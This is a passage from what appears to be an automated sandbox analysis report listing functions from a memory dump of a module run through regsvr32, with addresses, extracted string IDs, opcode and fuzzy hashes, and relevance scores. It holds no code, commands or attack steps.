                                Function 0000000180013B94 Relevance: 4.1, Strings: 3, Instructions: 322COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $L+$S'$$o%
                                • API String ID: 0-4100028055
                                • Opcode ID: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                • Instruction ID: 179b9f87c3a4f9e214743648708db8209e3d71a45a824f016a1577c5ed2144a1
                                • Opcode Fuzzy Hash: 9fd258a3895b4d268f32f05a4a2d93e51bad250bed430a342084c072b36ef08c
                                • Instruction Fuzzy Hash: 34F1DFB1504609DFCB98DF28C0896DE7BE0FB58358F41812AFC4A9B264D770DA68DB45
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001D510 Relevance: 4.1, Strings: 3, Instructions: 317COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: D"C!$r>$7
                                • API String ID: 0-4181936694
                                • Opcode ID: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                • Instruction ID: 0283378d108cf163dc6514248e6e0b5631fea62f1129ef615c9b8fd25e2e86b8
                                • Opcode Fuzzy Hash: 541cc3c13b8465e2a0518f703328e58551f25428cc9c4eed4f201bddabca6e18
                                • Instruction Fuzzy Hash: 1BE1EF70510B4CEBDBD9DF28D8CAADD3BA0FB48394FA06219FD0686250D775D989CB81
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180017C8C Relevance: 4.0, Strings: 3, Instructions: 298COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: 47T]$K_j$is[
                                • API String ID: 0-2699472077
                                • Opcode ID: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction ID: 6016c1221021197edd7f817fb9cbd09fcb5ac8bbf6c5f54f5697c1ffe249b4d0
                                • Opcode Fuzzy Hash: f40290fddc4da9899e50fb62f60591b1b1e6ff44cb1495cdff8c692982a81ea2
                                • Instruction Fuzzy Hash: 2CD127719047CD8FCF99CFA8C88A6EE7BB1FB48344F50821DE80697651C7B4990ACB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180005E7C Relevance: 4.0, Strings: 3, Instructions: 288COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: B+=$Mt$[4
                                • API String ID: 0-935141491
                                • Opcode ID: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                • Instruction ID: bf1f234f614a92c8f0daef92778263c373ce788cc2d228a45e1a9745d38385ec
                                • Opcode Fuzzy Hash: a60433d87628b4dd05d8c24f82dcc33c98af1bb7bb81019966b8dd8b9453b802
                                • Instruction Fuzzy Hash: 36F1D470505B888FDBB9DF24CC897EB7BA0FB94316F10551EE84A9A290DFB49648CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000F678 Relevance: 4.0, Strings: 3, Instructions: 271COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $c7$@%?5$b3
                                • API String ID: 0-1970763919
                                • Opcode ID: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                • Instruction ID: 7544b270a4a1d87a4c453583f66bfc56a0d33d7204b7a287ddb0882fb61d0d22
                                • Opcode Fuzzy Hash: 9dd9411ae2ae8fe50429bce004b52f82e822d73dcaf286881c61fffa8cd320f1
                                • Instruction Fuzzy Hash: 48E158B5902748CFCB88DF68C69A59D7BF1FF59308F404029FC1A9A264D7B4D928CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180011904 Relevance: 4.0, Strings: 3, Instructions: 235COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #^$`]$%
                                • API String ID: 0-102912427
                                • Opcode ID: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                • Instruction ID: 878e7741f870b7fe1bc6c0f4a33361fdae8fd10665ac772b8c524eb0937c225a
                                • Opcode Fuzzy Hash: ca2120b3b73aeab9747ebd3a80ee073ee8f7bbd66699a0431753568d5f85675a
                                • Instruction Fuzzy Hash: FDB1277090474D8FCF48CF68C88A6DE7BF0FB48398F165219E85AA6250D778D549CF89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180014AA4 Relevance: 4.0, Strings: 3, Instructions: 234COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: EQp$JK8[$kU
                                • API String ID: 0-1401246002
                                • Opcode ID: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                • Instruction ID: 75ff6837d11cf9dd0609e11c9b8f3cf17f900585419d92be27056132c399e7dd
                                • Opcode Fuzzy Hash: f6e783ca98e508b57d8889390bb84d83c8a7c59b34dd19a79ab41ed993f4136f
                                • Instruction Fuzzy Hash: 2EB1587190474DCBCF88CF68C48A6DE7BF0FB58358F165219E94AA6260C778D584CF89
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800171B8 Relevance: 4.0, Strings: 3, Instructions: 233COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: /@=`$h$zJ
                                • API String ID: 0-1145068787
                                • Opcode ID: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                • Instruction ID: efaff62c6dea5b666cd0ec5e1287633bd35f75f1b854ced8b25ae11fb6165d3c
                                • Opcode Fuzzy Hash: 058fb21ebd37bd9eb3c247c823e69362e4f90846d4c9b1e02e85b924af49b442
                                • Instruction Fuzzy Hash: 74A12F70608B4C8BEB9ADF18C4857DD7BF1FB49384F508559F84A86292CB34DA49CB86
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180029710 Relevance: 4.0, Strings: 3, Instructions: 232COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: $g$>6$nB
                                • API String ID: 0-1868063892
                                • Opcode ID: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                • Instruction ID: 5ef365e91c1d80a07604eb41db5a1b86f6ebf61e3d7968a3749ade557fb4125b
                                • Opcode Fuzzy Hash: ff2a3d7c641745ffb25121b662fa46cfa0900d035ad6a59b85364cfb369e7909
                                • Instruction Fuzzy Hash: 7CB121705193849FC7A9CF68C58569EBBF0FB88744F906A1DF8868B260D7B4DA44CF42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180012BB8 Relevance: 4.0, Strings: 3, Instructions: 229COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #\9$Vj+&$M
                                • API String ID: 0-3658199817
                                • Opcode ID: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                • Instruction ID: 26c1b974044aa0bae0d49f3ac843ec2fe1acc35572613d15cd803358aab69238
                                • Opcode Fuzzy Hash: b54fe4db0c482ebc48653361818c1ec5b550a7c5ec628dbf807c67c5d3739686
                                • Instruction Fuzzy Hash: FEA144709147098FCB48CFA8D88A5DEBBF0FB48318F11421DE89AB7250D778A945CF99
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180027E14 Relevance: 4.0, Strings: 3, Instructions: 224COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$d,U$d3
                                • API String ID: 0-3246363944
                                • Opcode ID: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                • Instruction ID: e67d37b33042bdc2b75ebe9cceb0670a2214c716ea8b8408a91d9fe0cb16ea97
                                • Opcode Fuzzy Hash: b19347f6a86a0bef7f71d8365dac67f13c927bf2e0e4be2ddf998f75a428a595
                                • Instruction Fuzzy Hash: 84C1F9715093C8CBDBBEDF64C885BDA3BA9FB44708F10521DEA0A9E258CB745749CB41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001447C Relevance: 3.9, Strings: 3, Instructions: 188COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: X9T[$Y)~$Zo
                                • API String ID: 0-3816472334
                                • Opcode ID: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                • Instruction ID: 74daf22561f986eaee31dd2e877d7e0390ad28e8a973cc345c4d359d4462c4de
                                • Opcode Fuzzy Hash: 4d45b44019f37ffc6e1bc3352b37dca48114cbe71f71f11aaeec7abd6044a81e
                                • Instruction Fuzzy Hash: A8A17CB5A02749CBCF48DF68C29A59D7BF1BF49304F408129FC1A9A360E3B5E525CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800141C8 Relevance: 3.9, Strings: 3, Instructions: 138COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: HR$HR$K)
                                • API String ID: 0-1226256413
                                • Opcode ID: fe1a1f4cc53af174484b1611b8e08b9bf30ae67f3885f7bd771c709debbd063f
                                • Instruction ID: e79f82d9c1651787cdde5b7f69db4956d02e0856481d2681396fdc662c453c95
                                • Opcode Fuzzy Hash: fe1a1f4cc53af174484b1611b8e08b9bf30ae67f3885f7bd771c709debbd063f
                                • Instruction Fuzzy Hash: 7B511971A08B0D8FDB58DFE8C4856EEBBF1FB48354F004119E81AB72A4C7749A09CB95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002CCE0 Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: ]u$"$:;
                                • API String ID: 0-2021956800
                                • Opcode ID: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
                                • Instruction ID: 26b28f3a503e825e1842dbf9688ebde44fe9506c1339f803b7779101942ae612
                                • Opcode Fuzzy Hash: e5b729e8d3ca91e6ffaa64c5216b9ad0038ed08cda9d2019842c7aa3bd36f9ee
                                • Instruction Fuzzy Hash: A4619CB490438E8FCB48DF68C88A5CE7BB0FB48758F104A19EC26A7250D3B49664CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180017710 Relevance: 3.8, Strings: 3, Instructions: 94COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :/$MX-$p/{
                                • API String ID: 0-4131788469
                                • Opcode ID: dafbc4e7fc6d693899884ed9ed99f384ad96a46aea59d1081574b489c0c87a57
                                • Instruction ID: 300bb33d5e72857c277ccbf4b656446e283825a036a8781aa3fd7c6b43312ff2
                                • Opcode Fuzzy Hash: dafbc4e7fc6d693899884ed9ed99f384ad96a46aea59d1081574b489c0c87a57
                                • Instruction Fuzzy Hash: A451CFB181034E8FCB48CF68C49A9DEBFB0FB58358F104619E816A6260D3B496A4CFD5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180014930 Relevance: 3.8, Strings: 3, Instructions: 80COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: #X$^'$r]I
                                • API String ID: 0-2222137400
                                • Opcode ID: 6c7560d6808315bae7f49c2fb11faa3634dddad0bf829aa3411576f4b5dc867d
                                • Instruction ID: 3b6e37f17289f863f41b4cc43218ba669218828eb13bdfb79aac3f5d198efd30
                                • Opcode Fuzzy Hash: 6c7560d6808315bae7f49c2fb11faa3634dddad0bf829aa3411576f4b5dc867d
                                • Instruction Fuzzy Hash: 363117B15087C48BD75DDFA8C49A21EFBE1BB84344F508A1DF5828A760D7F4D548CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800154B8 Relevance: 3.8, Strings: 3, Instructions: 64COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: @$T3$$w4
                                • API String ID: 0-2021144935
                                • Opcode ID: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                • Instruction ID: b7ecb3d52509d16e0b7106ebb5b87557e4c245f613a26780fe6ea3dbe1bda8ab
                                • Opcode Fuzzy Hash: bc7dc22fb94c9f236bd87286f30cded165edce72f2f8fa2203197d10143a9bcc
                                • Instruction Fuzzy Hash: 2C31B1B452C781AFC788DF28C49981EBBE1FB88314F806A1CF8C68B354D7799815CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001890C Relevance: 2.8, Strings: 2, Instructions: 306COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: fuQ$z2[
                                • API String ID: 0-2289383304
                                • Opcode ID: 441494ec0c86c783de8318a42c6139c52bb1bde3da6283a2c639beb8e2f65b2f
                                • Instruction ID: 6dbb2b06e415c8f3afbcfc152abca8622b4e8fcbe683a1ba83f0e2cb341d8d2f
                                • Opcode Fuzzy Hash: 441494ec0c86c783de8318a42c6139c52bb1bde3da6283a2c639beb8e2f65b2f
                                • Instruction Fuzzy Hash: 3EE11E7150670CCBDB68CF38C58A69D7BE1FF54348F205129EC1A9B262D770E929CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180020A34 Relevance: 2.8, Strings: 2, Instructions: 279COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: :C$kR[
                                • API String ID: 0-2209222604
                                • Opcode ID: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                • Instruction ID: 7c9a6a6b3faeb9776e3b10aef600c10835f2b607fd00d40f7bdfdfd53dfcb9a1
                                • Opcode Fuzzy Hash: 11a29c0ca78bb61b91ac56aed3bc2f39647a1b65c88feb917197daf0b3f95e80
                                • Instruction Fuzzy Hash: 90D13870A4470C8FDB99DFA8D04A7DDBBF2FB48344F108119E80AAF295C7B49949CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800227E0 Relevance: 2.8, Strings: 2, Instructions: 266COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: U/a$b*I
                                • API String ID: 0-148379327
                                • Opcode ID: 5fd17e9242f9f83aee3c84d8a49cb22fc0f07f7b85d6bf0c23bfb3783ccf2aec
                                • Instruction ID: 7d254379c67d49f8dc4f025a9255c0c47b4989c88be3dfa38f92a25c6632ea03
                                • Opcode Fuzzy Hash: 5fd17e9242f9f83aee3c84d8a49cb22fc0f07f7b85d6bf0c23bfb3783ccf2aec
                                • Instruction Fuzzy Hash: 28D10B7150024E8BCB59CF68C88A6DE3FB0FB18398F155219FC5AA7250D7B8D698CBC5
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180022E38 Relevance: 2.8, Strings: 2, Instructions: 250COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Jl$aijA
                                • API String ID: 0-1592139677
                                • Opcode ID: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                • Instruction ID: 7b4029e1b0f4c6d16455640de175402024ed69906be1bf35ac226dba8d49acae
                                • Opcode Fuzzy Hash: 63e2519535c0a0a06864801ebef0b78a9df6d39fc0654acb9b8633e279544aec
                                • Instruction Fuzzy Hash: 4AC1217111474CCFDBA9CF28C59A6DA3BE8FF48344F10412AFC5A86261C774EA58CB42
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180021F7C Relevance: 2.7, Strings: 2, Instructions: 223COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: E!X$aT
                                • API String ID: 0-1608121357
                                • Opcode ID: 6891fb2d6db3071f9b84c44756173137ff7b28830fe573994ee80e512644894e
                                • Instruction ID: 4d019785a6b4256ed0cfe79ca05195ecf0bf4926bcad1b682180c0cba5e5cf4f
                                • Opcode Fuzzy Hash: 6891fb2d6db3071f9b84c44756173137ff7b28830fe573994ee80e512644894e
                                • Instruction Fuzzy Hash: 16B12770E0470ECFCB99DFE8C4556EFB7B6FB58388F0081599806A6290DB748719CB85
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000C85C Relevance: 2.7, Strings: 2, Instructions: 219COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: i6$5t
                                • API String ID: 0-3127670231
                                • Opcode ID: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                • Instruction ID: 343c37a285082c0d22a0c6c838fe19bbba7b54ff6f1f952ba2714c32cb406723
                                • Opcode Fuzzy Hash: a253027af394429a069129eb83cd81c4fb0c40bb542b60a20d2aa22b5b78e39c
                                • Instruction Fuzzy Hash: B6A1E270D087188FDB69DFB9C88A69DBBF0FB48708F20821DD856A7252DB749949CF41
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018002868C Relevance: 2.7, Strings: 2, Instructions: 178COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: t3Z$r'
                                • API String ID: 0-3247238830
                                • Opcode ID: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                • Instruction ID: 1d29c97d450220819c0ed5b60dd6ff5608267f61915941bb22285759947d3464
                                • Opcode Fuzzy Hash: 45187aede304d4735527529db4b0bfe1669f1d2749ba8206633b0fe433a295e4
                                • Instruction Fuzzy Hash: 74A1EC706057CC9FEBB9DF24C8897DE7BA0FB4A344F50461DE88A8E260DB745649CB02
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800180D4 Relevance: 2.7, Strings: 2, Instructions: 172COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: N}V$jt
                                • API String ID: 0-2926509837
                                • Opcode ID: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                • Instruction ID: 5d852b2b0b88ea82dc6b1cd0fb1e099f39aebf29041bab94b5a0a50aabd496dc
                                • Opcode Fuzzy Hash: b049d5321a5d0b8b2c35b06077383899f8fb99c1ca51b799598ed477ff688beb
                                • Instruction Fuzzy Hash: 64A148B990628CDFCB98DFA8C5CA58D7BB1FF44308F00411AFC169A256D7B4D629CB49
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018000B618 Relevance: 2.7, Strings: 2, Instructions: 154COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: |I$}r/
                                • API String ID: 0-4123960085
                                • Opcode ID: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                • Instruction ID: 800e601dd46cbb9d9738628f52141beaff35432bc8d4d1bcfb76f59376750d80
                                • Opcode Fuzzy Hash: a5b20f145e2128ebb590cd3c49dff006a35873bd4209483889af058205fdcd1a
                                • Instruction Fuzzy Hash: 2981F2711047888BDBB9CF28C88A7DA7BA1FB95348F50C219D88ECE261DF75564DDB01
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 000000018001B3B8 Relevance: 2.6, Strings: 2, Instructions: 149COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Fd7$T;
                                • API String ID: 0-1040651304
                                • Opcode ID: 7f0199fa78f26e8ae3d4cfff6d4ba3547f4bc3c86668e4528162529d3c3e3bb8
                                • Instruction ID: 7ffd56a0096037782dccd6a22a1dfddd73a4019a8d8d07411bfc7024195b5d88
                                • Opcode Fuzzy Hash: 7f0199fa78f26e8ae3d4cfff6d4ba3547f4bc3c86668e4528162529d3c3e3bb8
                                • Instruction Fuzzy Hash: 8071E47051074D9FCB89CF24C8C9ADA7FB1FB483A8FA56218FC0696255C774D989CB84
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180008BC0 Relevance: 2.6, Strings: 2, Instructions: 132COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: bep$o1S[
                                • API String ID: 0-985821681
                                • Opcode ID: c77bf9ac064369e7680d63b20ce0fc89bb0b2606aa702be6d1acaa4fa6638a8c
                                • Instruction ID: 91a209abfe7e4aeb1d81c4716095da0dca5975d88cd9946800e077bcf0a455c5
                                • Opcode Fuzzy Hash: c77bf9ac064369e7680d63b20ce0fc89bb0b2606aa702be6d1acaa4fa6638a8c
                                • Instruction Fuzzy Hash: C2513A70A0830D8FDB68DFA8C4456EEB7F2FB58358F004519E44AEB290DB349A19CF95
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00000001800087A4 Relevance: 2.6, Strings: 2, Instructions: 127COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: _6#$u<
                                • API String ID: 0-4076860791
                                • Opcode ID: 98c419b77e8ba2554e3faf170cbc78b74b026a1788d9e59b3cc1785a688e6d9f
                                • Instruction ID: 493e3a016aefd0e8f5cec56f814c132ed6dac505d4b0458c18be2d4878a88dba
                                • Opcode Fuzzy Hash: 98c419b77e8ba2554e3faf170cbc78b74b026a1788d9e59b3cc1785a688e6d9f
                                • Instruction Fuzzy Hash: D451C0B190070A8BCB48CF68C4965DE7FB1FB68394F24422DE856A6350D3749AA5CFD4
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0000000180010590 Relevance: 2.6, Strings: 2, Instructions: 126COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000003.00000002.926762397.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: Nz$Nz
                                • API String ID: 0-3618188535
